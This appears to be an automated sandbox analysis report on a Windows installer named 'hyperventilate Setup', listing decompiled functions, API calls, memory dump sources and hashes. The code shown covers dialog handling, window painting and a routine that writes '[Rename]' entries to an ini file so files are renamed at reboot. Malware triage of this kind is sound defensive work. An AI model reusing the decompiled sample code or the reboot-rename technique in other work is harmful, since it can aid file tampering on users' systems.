                                                                                                                              0x00403b25
                                                                                                                              0x00403b2b
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00403b2d
                                                                                                                              0x00000000
                                                                                                                              0x00403b2d
                                                                                                                              0x00403b1d
                                                                                                                              0x00000000
                                                                                                                              0x00403b1d
                                                                                                                              0x00403b03
                                                                                                                              0x00403b0a
                                                                                                                              0x00403b10
                                                                                                                              0x00403b12
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00403b12
                                                                                                                              0x00403ace
                                                                                                                              0x00000000
                                                                                                                              0x00403aac
                                                                                                                              0x00403ab2
                                                                                                                              0x00403abc
                                                                                                                              0x00403ec2
                                                                                                                              0x00403ec8
                                                                                                                              0x00403eca
                                                                                                                              0x00403ed0
                                                                                                                              0x00403ed5
                                                                                                                              0x00403edb
                                                                                                                              0x00403edb
                                                                                                                              0x00403ed0
                                                                                                                              0x00403ee5
                                                                                                                              0x00000000
                                                                                                                              0x00403ee5
                                                                                                                              0x00403aaa

                                                                                                                              APIs
                                                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403A81
                                                                                                                              • ShowWindow.USER32(?), ref: 00403A9E
                                                                                                                              • DestroyWindow.USER32 ref: 00403AB2
                                                                                                                              • SetWindowLongA.USER32 ref: 00403ACE
                                                                                                                              • GetDlgItem.USER32 ref: 00403AEF
                                                                                                                              • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403B03
                                                                                                                              • IsWindowEnabled.USER32(00000000), ref: 00403B0A
                                                                                                                              • GetDlgItem.USER32 ref: 00403BB8
                                                                                                                              • GetDlgItem.USER32 ref: 00403BC2
                                                                                                                              • SetClassLongA.USER32(?,000000F2,?,0000001C,000000FF), ref: 00403BDC
                                                                                                                              • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403C2D
                                                                                                                              • GetDlgItem.USER32 ref: 00403CD3
                                                                                                                              • ShowWindow.USER32(00000000,?), ref: 00403CF4
                                                                                                                              • EnableWindow.USER32(?,?), ref: 00403D06
                                                                                                                              • EnableWindow.USER32(?,?), ref: 00403D21
                                                                                                                              • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403D37
                                                                                                                              • EnableMenuItem.USER32 ref: 00403D3E
                                                                                                                              • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403D56
                                                                                                                              • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403D69
                                                                                                                              • lstrlenA.KERNEL32(004204A0,?,004204A0,hyperventilate Setup), ref: 00403D92
                                                                                                                              • SetWindowTextA.USER32(?,004204A0), ref: 00403DA1
                                                                                                                              • ShowWindow.USER32(?,0000000A), ref: 00403ED5
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.201984153.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.201978360.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.201994006.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202000566.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202075629.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202089293.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202121649.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202148009.000000000042F000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202159816.0000000000433000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202170813.0000000000437000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202189588.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202210290.000000000043C000.00000002.00020000.sdmp Download File
                                                                                                                              Similarity
                                                                                                                              • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                                                                              • String ID: hyperventilate Setup
                                                                                                                              • API String ID: 184305955-2373916053
                                                                                                                              • Opcode ID: 14e7e0a8131732f9e150b36a7fce0cb21c204cb0cec2561e24870ec1d01c69b9
                                                                                                                              • Instruction ID: 1b558320748e03173a152966608fa9e4bba3452d5179f8dde3fdb5243a6fbb8a
                                                                                                                              • Opcode Fuzzy Hash: 14e7e0a8131732f9e150b36a7fce0cb21c204cb0cec2561e24870ec1d01c69b9
                                                                                                                              • Instruction Fuzzy Hash: 21C18071A04204BBDB216F21ED45E2B3E7DEB4970AF40053EF541B12E1C739AA42DB6E
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00404060, Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 204windowstringCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 93%
                                                                                                                              			E00404060(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				char _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				intOrPtr _t71;
				intOrPtr _t85;
				long _t86;
				int _t98;
				struct HWND__* _t99;
				signed int _t100;
				intOrPtr _t107;
				intOrPtr _t109;
				int _t110;
				signed int* _t112;
				signed int _t113;
				char* _t114;
				CHAR* _t115;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L11:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x420480 =  *0x420480 + 1;
							}
							L25:
							_t110 = _a16;
							L26:
							return E00403F7F(_a8, _a12, _t110);
						}
						_t52 = GetDlgItem(_a4, 0x3e8);
						_t110 = _a16;
						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
							_t109 =  *((intOrPtr*)(_t110 + 0x18));
							_v12 = _t100;
							_v16 = _t109;
							_v8 = 0x422e40;
							if(_t100 - _t109 < 0x800) {
								SendMessageA(_t52, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorA(0, 0x7f02));
								_t40 =  &_v8; // 0x422e40
								ShellExecuteA(_a4, "open",  *_t40, 0, 0, 1);
								SetCursor(LoadCursorA(0, 0x7f00));
								_t110 = _a16;
							}
						}
						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
							goto L26;
						} else {
							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
								SendMessageA( *0x423ea8, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
								SendMessageA( *0x423ea8, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x420480 != 0) {
						goto L25;
					} else {
						_t112 =  *0x41fc70 + 0x14;
						if(( *_t112 & 0x00000020) == 0) {
							goto L25;
						}
						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E00403F3A(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E004042EB();
						goto L11;
					}
				}
				_t98 = _a16;
				_t113 =  *(_t98 + 0x30);
				if(_t113 < 0) {
					_t107 =  *0x42367c; // 0x565f8f
					_t113 =  *(_t107 - 4 + _t113 * 4);
				}
				_t71 =  *0x423ed8; // 0x5644b8
				_push( *((intOrPtr*)(_t98 + 0x34)));
				_t114 = _t113 + _t71;
				_push(0x22);
				_a16 =  *_t114;
				_v12 = _v12 & 0x00000000;
				_t115 = _t114 + 1;
				_v16 = _t115;
				_v8 = E0040402C;
				E00403F18(_a4);
				_push( *((intOrPtr*)(_t98 + 0x38)));
				_push(0x23);
				E00403F18(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E00403F3A( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
				_t99 = GetDlgItem(_a4, 0x3e8);
				E00403F4D(_t99);
				SendMessageA(_t99, 0x45b, 1, 0);
				_t85 =  *0x423eb0; // 0x55edd0
				_t86 =  *(_t85 + 0x68);
				if(_t86 < 0) {
					_t86 = GetSysColor( ~_t86);
				}
				SendMessageA(_t99, 0x443, 0, _t86);
				SendMessageA(_t99, 0x445, 0, 0x4010000);
				 *0x41f464 =  *0x41f464 & 0x00000000;
				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
				SendMessageA(_t99, 0x449, _a16,  &_v16);
				 *0x420480 =  *0x420480 & 0x00000000;
				return 0;
			}




















                                                                                                                              0x00404070
                                                                                                                              0x00404196
                                                                                                                              0x004041f2
                                                                                                                              0x004041f6
                                                                                                                              0x004042cd
                                                                                                                              0x004042cf
                                                                                                                              0x004042cf
                                                                                                                              0x004042d5
                                                                                                                              0x004042d5
                                                                                                                              0x004042d8
                                                                                                                              0x00000000
                                                                                                                              0x004042df
                                                                                                                              0x00404204
                                                                                                                              0x00404206
                                                                                                                              0x00404210
                                                                                                                              0x0040421b
                                                                                                                              0x0040421e
                                                                                                                              0x00404221
                                                                                                                              0x0040422c
                                                                                                                              0x0040422f
                                                                                                                              0x00404236
                                                                                                                              0x00404244
                                                                                                                              0x0040425c
                                                                                                                              0x00404264
                                                                                                                              0x0040426f
                                                                                                                              0x0040427f
                                                                                                                              0x00404281
                                                                                                                              0x00404281
                                                                                                                              0x00404236
                                                                                                                              0x0040428b
                                                                                                                              0x00000000
                                                                                                                              0x00404296
                                                                                                                              0x0040429a
                                                                                                                              0x004042ab
                                                                                                                              0x004042ab
                                                                                                                              0x004042b1
                                                                                                                              0x004042bf
                                                                                                                              0x004042bf
                                                                                                                              0x00000000
                                                                                                                              0x004042c3
                                                                                                                              0x0040428b
                                                                                                                              0x004041a1
                                                                                                                              0x00000000
                                                                                                                              0x004041b5
                                                                                                                              0x004041bb
                                                                                                                              0x004041c1
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004041e6
                                                                                                                              0x004041e8
                                                                                                                              0x004041ed
                                                                                                                              0x00000000
                                                                                                                              0x004041ed
                                                                                                                              0x004041a1
                                                                                                                              0x00404076
                                                                                                                              0x00404079
                                                                                                                              0x0040407e
                                                                                                                              0x00404080
                                                                                                                              0x0040408f
                                                                                                                              0x0040408f
                                                                                                                              0x00404091
                                                                                                                              0x00404096
                                                                                                                              0x00404099
                                                                                                                              0x0040409b
                                                                                                                              0x004040a0
                                                                                                                              0x004040a9
                                                                                                                              0x004040af
                                                                                                                              0x004040bb
                                                                                                                              0x004040be
                                                                                                                              0x004040c7
                                                                                                                              0x004040cc
                                                                                                                              0x004040cf
                                                                                                                              0x004040d4
                                                                                                                              0x004040eb
                                                                                                                              0x004040f2
                                                                                                                              0x00404105
                                                                                                                              0x00404108
                                                                                                                              0x0040411d
                                                                                                                              0x0040411f
                                                                                                                              0x00404124
                                                                                                                              0x00404129
                                                                                                                              0x0040412e
                                                                                                                              0x0040412e
                                                                                                                              0x0040413d
                                                                                                                              0x0040414c
                                                                                                                              0x0040414e
                                                                                                                              0x00404164
                                                                                                                              0x00404173
                                                                                                                              0x00404175
                                                                                                                              0x00000000

                                                                                                                              APIs
                                                                                                                              • CheckDlgButton.USER32 ref: 004040EB
                                                                                                                              • GetDlgItem.USER32 ref: 004040FF
                                                                                                                              • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 0040411D
                                                                                                                              • GetSysColor.USER32(?), ref: 0040412E
                                                                                                                              • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 0040413D
                                                                                                                              • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 0040414C
                                                                                                                              • lstrlenA.KERNEL32(?), ref: 00404156
                                                                                                                              • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00404164
                                                                                                                              • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00404173
                                                                                                                              • GetDlgItem.USER32 ref: 004041D6
                                                                                                                              • SendMessageA.USER32(00000000), ref: 004041D9
                                                                                                                              • GetDlgItem.USER32 ref: 00404204
                                                                                                                              • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404244
                                                                                                                              • LoadCursorA.USER32 ref: 00404253
                                                                                                                              • SetCursor.USER32(00000000), ref: 0040425C
                                                                                                                              • ShellExecuteA.SHELL32(0000070B,open,@.B,00000000,00000000,00000001), ref: 0040426F
                                                                                                                              • LoadCursorA.USER32 ref: 0040427C
                                                                                                                              • SetCursor.USER32(00000000), ref: 0040427F
                                                                                                                              • SendMessageA.USER32(00000111,00000001,00000000), ref: 004042AB
                                                                                                                              • SendMessageA.USER32(00000010,00000000,00000000), ref: 004042BF
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.201984153.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.201978360.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.201994006.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202000566.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202075629.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202089293.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202121649.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202148009.000000000042F000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202159816.0000000000433000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202170813.0000000000437000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202189588.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202210290.000000000043C000.00000002.00020000.sdmp Download File
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                                                              • String ID: @.B$N$open
                                                                                                                              • API String ID: 3615053054-3815657624
                                                                                                                              • Opcode ID: e8b988e3949f0b6d91b1b58256fef292242953983a672fd1ea6cb44b2e1e2ed0
                                                                                                                              • Instruction ID: 7761d7a6ce13443680711406d70bf9c6d022160e69bfd2fffc9b265f6460a43d
                                                                                                                              • Opcode Fuzzy Hash: e8b988e3949f0b6d91b1b58256fef292242953983a672fd1ea6cb44b2e1e2ed0
                                                                                                                              • Instruction Fuzzy Hash: 4661B2B1A40209BFEB109F60DC45F6A3B69FB44755F10817AFB04BA2D1C7B8A951CF98
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00401000, Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 90%
                                                                                                                              			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				intOrPtr _t115;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x423eb0; // 0x55edd0
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, "hyperventilate Setup", 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					_t115 =  *0x423ea8; // 0x0
					 *((intOrPtr*)(_t102 + 4)) = _t115;
				}
				return DefWindowProcA(_a4, _a8, _a12, _t102);
			}














                                                                                                                              0x0040100a
                                                                                                                              0x00401039
                                                                                                                              0x00401047
                                                                                                                              0x0040104d
                                                                                                                              0x00401051
                                                                                                                              0x0040105b
                                                                                                                              0x00401061
                                                                                                                              0x00401064
                                                                                                                              0x004010f3
                                                                                                                              0x00401089
                                                                                                                              0x0040108c
                                                                                                                              0x004010a6
                                                                                                                              0x004010bd
                                                                                                                              0x004010cc
                                                                                                                              0x004010cf
                                                                                                                              0x004010d5
                                                                                                                              0x004010d9
                                                                                                                              0x004010e4
                                                                                                                              0x004010ed
                                                                                                                              0x004010ef
                                                                                                                              0x004010ef
                                                                                                                              0x00401100
                                                                                                                              0x00401105
                                                                                                                              0x0040110d
                                                                                                                              0x00401110
                                                                                                                              0x00401112
                                                                                                                              0x00401118
                                                                                                                              0x0040111f
                                                                                                                              0x00401126
                                                                                                                              0x00401130
                                                                                                                              0x00401142
                                                                                                                              0x00401156
                                                                                                                              0x00401160
                                                                                                                              0x00401165
                                                                                                                              0x00401165
                                                                                                                              0x00401110
                                                                                                                              0x0040116e
                                                                                                                              0x00000000
                                                                                                                              0x00401178
                                                                                                                              0x00401010
                                                                                                                              0x00401013
                                                                                                                              0x00401015
                                                                                                                              0x00401019
                                                                                                                              0x0040101f
                                                                                                                              0x0040101f
                                                                                                                              0x00000000

                                                                                                                              APIs
                                                                                                                              • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                              • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                              • GetClientRect.USER32 ref: 0040105B
                                                                                                                              • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                              • FillRect.USER32 ref: 004010E4
                                                                                                                              • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                              • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                                                                              • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                              • SetTextColor.GDI32(00000000,?), ref: 00401130
                                                                                                                              • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                              • DrawTextA.USER32(00000000,hyperventilate Setup,000000FF,00000010,00000820), ref: 00401156
                                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                              • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                              • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.201984153.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.201978360.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.201994006.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202000566.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202075629.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202089293.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202121649.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202148009.000000000042F000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202159816.0000000000433000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202170813.0000000000437000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202189588.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202210290.000000000043C000.00000002.00020000.sdmp Download File
                                                                                                                              Similarity
                                                                                                                              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                              • String ID: F$hyperventilate Setup
                                                                                                                              • API String ID: 941294808-386754524
                                                                                                                              • Opcode ID: 1fa3053a276be56ef7da5d68adfba1d9971bfb9fa2beb597bf2db4fb963a824d
                                                                                                                              • Instruction ID: 81477e3a2fde3fb3f26aa953fc06e347994717d76cab2c79682594c458f31f57
                                                                                                                              • Opcode Fuzzy Hash: 1fa3053a276be56ef7da5d68adfba1d9971bfb9fa2beb597bf2db4fb963a824d
                                                                                                                              • Instruction Fuzzy Hash: 8141BC71804249AFCB058FA4CD459BFBFB9FF44314F00802AF551AA1A0C378EA54DFA5
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 004058B4, Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 144filememoryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 93%
                                                                                                                              			E004058B4() {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t15;
				long _t16;
				intOrPtr _t18;
				int _t20;
				void* _t28;
				long _t29;
				intOrPtr* _t37;
				int _t43;
				void* _t44;
				long _t47;
				CHAR* _t49;
				void* _t51;
				void* _t53;
				intOrPtr* _t54;
				void* _t55;
				void* _t56;

				_t15 = E00405E88(1);
				_t49 =  *(_t55 + 0x18);
				if(_t15 != 0) {
					_t20 =  *_t15( *(_t55 + 0x1c), _t49, 5);
					if(_t20 != 0) {
						L16:
						 *0x423f30 =  *0x423f30 + 1;
						return _t20;
					}
				}
				 *0x422630 = 0x4c554e;
				if(_t49 == 0) {
					L5:
					_t16 = GetShortPathNameA( *(_t55 + 0x1c), 0x4220a8, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						_t43 = wsprintfA(0x421ca8, "%s=%s\r\n", 0x422630, 0x4220a8);
						_t18 =  *0x423eb0; // 0x55edd0
						_t56 = _t55 + 0x10;
						E00405B88(_t43, 0x400, 0x4220a8, 0x4220a8,  *((intOrPtr*)(_t18 + 0x128)));
						_t20 = E0040583D(0x4220a8, 0xc0000000, 4);
						_t53 = _t20;
						 *(_t56 + 0x14) = _t53;
						if(_t53 == 0xffffffff) {
							goto L16;
						}
						_t47 = GetFileSize(_t53, 0);
						_t7 = _t43 + 0xa; // 0xa
						_t51 = GlobalAlloc(0x40, _t47 + _t7);
						if(_t51 == 0 || ReadFile(_t53, _t51, _t47, _t56 + 0x18, 0) == 0 || _t47 !=  *(_t56 + 0x18)) {
							L15:
							_t20 = CloseHandle(_t53);
							goto L16;
						} else {
							if(E004057B2(_t51, "[Rename]\r\n") != 0) {
								_t28 = E004057B2(_t26 + 0xa, 0x409350);
								if(_t28 == 0) {
									L13:
									_t29 = _t47;
									L14:
									E004057FE(_t51 + _t29, 0x421ca8, _t43);
									SetFilePointer(_t53, 0, 0, 0);
									WriteFile(_t53, _t51, _t47 + _t43, _t56 + 0x18, 0);
									GlobalFree(_t51);
									goto L15;
								}
								_t37 = _t28 + 1;
								_t44 = _t51 + _t47;
								_t54 = _t37;
								if(_t37 >= _t44) {
									L21:
									_t53 =  *(_t56 + 0x14);
									_t29 = _t37 - _t51;
									goto L14;
								} else {
									goto L20;
								}
								do {
									L20:
									 *((char*)(_t43 + _t54)) =  *_t54;
									_t54 = _t54 + 1;
								} while (_t54 < _t44);
								goto L21;
							}
							E00405B66(_t51 + _t47, "[Rename]\r\n");
							_t47 = _t47 + 0xa;
							goto L13;
						}
					}
				} else {
					CloseHandle(E0040583D(_t49, 0, 1));
					_t16 = GetShortPathNameA(_t49, 0x422630, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						goto L5;
					}
				}
				return _t16;
			}






















                                                                                                                              0x004058ba
                                                                                                                              0x004058c1
                                                                                                                              0x004058c5
                                                                                                                              0x004058ce
                                                                                                                              0x004058d2
                                                                                                                              0x00405a11
                                                                                                                              0x00405a11
                                                                                                                              0x00000000
                                                                                                                              0x00405a11
                                                                                                                              0x004058d2
                                                                                                                              0x004058de
                                                                                                                              0x004058f4
                                                                                                                              0x0040591c
                                                                                                                              0x00405927
                                                                                                                              0x0040592b
                                                                                                                              0x0040594b
                                                                                                                              0x0040594d
                                                                                                                              0x00405952
                                                                                                                              0x0040595c
                                                                                                                              0x00405969
                                                                                                                              0x0040596e
                                                                                                                              0x00405973
                                                                                                                              0x00405977
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00405986
                                                                                                                              0x00405988
                                                                                                                              0x00405995
                                                                                                                              0x00405999
                                                                                                                              0x00405a0a
                                                                                                                              0x00405a0b
                                                                                                                              0x00000000
                                                                                                                              0x004059b5
                                                                                                                              0x004059c2
                                                                                                                              0x00405a27
                                                                                                                              0x00405a2e
                                                                                                                              0x004059d5
                                                                                                                              0x004059d5
                                                                                                                              0x004059d7
                                                                                                                              0x004059e0
                                                                                                                              0x004059eb
                                                                                                                              0x004059fd
                                                                                                                              0x00405a04
                                                                                                                              0x00000000
                                                                                                                              0x00405a04
                                                                                                                              0x00405a30
                                                                                                                              0x00405a31
                                                                                                                              0x00405a36
                                                                                                                              0x00405a38
                                                                                                                              0x00405a45
                                                                                                                              0x00405a45
                                                                                                                              0x00405a49
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00405a3a
                                                                                                                              0x00405a3a
                                                                                                                              0x00405a3d
                                                                                                                              0x00405a40
                                                                                                                              0x00405a41
                                                                                                                              0x00000000
                                                                                                                              0x00405a3a
                                                                                                                              0x004059cd
                                                                                                                              0x004059d2
                                                                                                                              0x00000000
                                                                                                                              0x004059d2
                                                                                                                              0x00405999
                                                                                                                              0x004058f6
                                                                                                                              0x00405901
                                                                                                                              0x0040590a
                                                                                                                              0x0040590e
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0040590e
                                                                                                                              0x00405a1b

                                                                                                                              APIs
                                                                                                                                • Part of subcall function 00405E88: GetModuleHandleA.KERNEL32(?,?,00000000,0040327F,00000008), ref: 00405E9A
                                                                                                                                • Part of subcall function 00405E88: LoadLibraryA.KERNELBASE(?,?,00000000,0040327F,00000008), ref: 00405EA5
                                                                                                                                • Part of subcall function 00405E88: GetProcAddress.KERNEL32(00000000,?), ref: 00405EB6
                                                                                                                              • CloseHandle.KERNEL32(00000000,?,00000000,00000001,00000001,?,00000000,?,?,00405649,?,00000000,000000F1,?), ref: 00405901
                                                                                                                              • GetShortPathNameA.KERNEL32 ref: 0040590A
                                                                                                                              • GetShortPathNameA.KERNEL32 ref: 00405927
                                                                                                                              • wsprintfA.USER32 ref: 00405945
                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,004220A8,C0000000,00000004,004220A8,?,?,?,00000000,000000F1,?), ref: 00405980
                                                                                                                              • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 0040598F
                                                                                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 004059A5
                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,00421CA8,00000000,-0000000A,00409350,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004059EB
                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,000000F1,?), ref: 004059FD
                                                                                                                              • GlobalFree.KERNEL32 ref: 00405A04
                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,00000000,000000F1,?), ref: 00405A0B
                                                                                                                                • Part of subcall function 004057B2: lstrlenA.KERNEL32(00000000,?,00000000,00000000,004059C0,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004057B9
                                                                                                                                • Part of subcall function 004057B2: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,004059C0,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004057E9
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.201984153.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.201978360.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.201994006.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202000566.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202075629.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202089293.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202121649.000000000042C000.00000002.00020000.sdmp Download File
